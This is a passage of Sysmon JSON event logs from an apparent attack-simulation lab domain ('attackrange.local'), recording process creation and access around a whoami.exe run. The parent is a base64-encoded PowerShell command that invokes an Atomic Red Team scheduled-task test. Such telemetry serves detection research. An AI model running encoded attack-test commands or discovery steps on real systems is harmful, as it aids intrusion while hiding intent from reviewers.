06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5431,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.958\r\nProcessGuid: {E2A3D6B1-11D3-5F25-0000-001030010800}\r\nProcessId: 3052\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nParentProcessId: 4780\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.958","ProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001030010800}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","ParentProcessId":"4780","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5432,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nSourceProcessId: 4780\r\nSourceThreadId: 3028\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001030010800}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffb5725b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8335|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8006|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffaa941b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefb8b9c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ff01706b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa561|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefec4e6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8a19|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff85b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8335|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8006|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffaa941b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefb8b9c","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","SourceProcessId":"4780","SourceThreadId":"3028","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001030010800}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffb5725b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8335|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8006|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffaa941b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefb8b9c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ff01706b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa561|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefec4e6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8a19|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff85b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8335|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8006|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffaa941b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefb8b9c","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5433,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001030010800}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001030010800}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5434,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5435,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5436,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5437,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 